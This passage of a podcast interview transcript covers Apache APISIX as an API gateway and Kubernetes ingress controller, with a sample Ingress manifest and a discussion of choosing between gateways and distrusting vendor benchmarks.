Chris Engelbert: Just quickly, hinting back at Kubernetes, and I may be wrong here: if I use APISIX, I do not need any other ingress system, because APISIX can be the ingress provider for Kubernetes, can't it?

Nicolas Fränkel: So getting back to Kubernetes, yes, we have an ingress controller, and we have a Helm chart. You can install APISIX inside your Kubernetes cluster, and it will serve as an ingress controller. You will have the ingress controller itself, and it will configure Apache APISIX according to your manifests.
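With the ingress controller installed (for example via the Helm chart), a standard Kubernetes Ingress manifest is enough; the controller watches it and translates it into APISIX routes. The host and service names below are invented:

```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: orders
spec:
  ingressClassName: apisix      # handled by the APISIX ingress controller
  rules:
    - host: api.example.com
      http:
        paths:
          - path: /orders
            pathType: Prefix
            backend:
              service:
                name: orders-svc
                port:
                  number: 8080
```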

Chris Engelbert: All right, cool. Just looking at the time, yeah, 20 minutes is not a lot. So when I want to use APISIX, should I call you guys at API7? Should I go with the Apache project? Or should I do something else?

Nicolas Fränkel: It depends. If you are a tech person, I would always encourage you to just take the project, use the Docker container, for example, play with it, check if it's exactly what you need, and try to understand its limits and benefits in your own organization. If you've got questions, we've got a Slack, I can send you the reference, and you can ask questions like, "Why, in this case, when I tried to do that, does it work like this when I wanted it to do that?" Then, when you think that Apache APISIX is the right solution, check if the open source version is enough. I believe that if you are running a company, you will need some kind of support at some point. Up until that point, of course, just use the open source version and be happy with it. If you want to use it in a production-grade environment with support, with guarantees and such, of course, please call us. It also pays my salary, so that's also great. You're welcome to play with the open source version and to check if it suits your requirements.

Chris Engelbert: Before we come to the last question, which is something I always have to ask, maybe a quick comparison to other products. There are a lot of API gateways, at least in air quotes, on the market. Why is APISIX special?

Nicolas Fränkel: First, every cloud provider comes with its own API gateway. My feeling is that all of them are much better integrated but much more limited in features. Again, if they suit you, then use them. That's fine. If you find at some point that you need workarounds, then perhaps it's time to move away from them. As for comparisons, the only really in-depth one I've done so far is with Spring Cloud Gateway. I have written a blog post about it, but in short: if you are a developer team using Spring, knowing Spring, then use Spring Cloud Gateway. It will be fine. If you want an Ops team to operate it, then it probably won't be that great. At the basic level you can do a lot with YAML, but then you find yourself needing to write Java code. Ops people, I'm sorry, but they are not experts in writing Java code, and you don't want to have a compile phase.

Anyway, as I mentioned before, if you are a team that manages its own domain, you have only developers or DevOps people, you are familiar with Java, you are experts in Spring, and you want to manage only your own stuff, then it could be a very good gateway for your needs. Otherwise, I'm not sure it's a great idea. Regarding the others, I honestly have no clue what the pros and cons are compared to Apache APISIX, but I know that Apache APISIX is the only truly open source project, the only one managed by the Apache Foundation. If you care about open source, not because you love open source so much, but because you care about the future of the project and its long-term maintainability, then that's our main benefit. I won't talk about performance or whatever, because, again, I didn't do any benchmark myself, and every benchmark provided by a vendor can probably be discarded out of the box, because you should do your own benchmark on your own infrastructure.

Chris Engelbert: Yeah. I couldn't have said that any better. It's something I keep telling people, whatever company I work for. There are always people asking for benchmarks, and it's always: don't believe benchmarks. Even if a vendor is really honest and tries to do meaningful benchmarks, it's always an artificial dataset. Run your own benchmarks, with your own datasets and your own operational behavior, and figure it out yourself. We can help you, but you shouldn't just take a vendor's benchmarks on faith.

Nicolas Fränkel: Right. Exactly.

Chris Engelbert: Alright. Ok. So we’re coming to the end of our episode. And something that I always ask everybody is if there’s one thing that you think people should take away from our conversation today, what would that be?

Nicolas Fränkel: I think the most important thing is that, regardless of the project or the tool you choose, you choose it for the right reasons. As I mentioned, if you're using a cloud provider and it suits your needs, then use it. If it doesn't suit your needs, if it's too limited, then don't hesitate to move away. The good thing with the cloud is that you're not stuck, right? And if you want a product that is focused on open source, and if you are in the open source space, I think Apache APISIX is a very good solution. And that's it. Always make choices that fit your needs. It's good that you don't have just one choice, right? You have a couple of them.

Chris Engelbert: That’s really well said. All right, so thank you very much, Nicolas, for being on the show. It was great having you.

Nicolas Fränkel: Thank you.

The post Improve Security with API Gateways, Nicolas Fränkel appeared first on simplyblock.
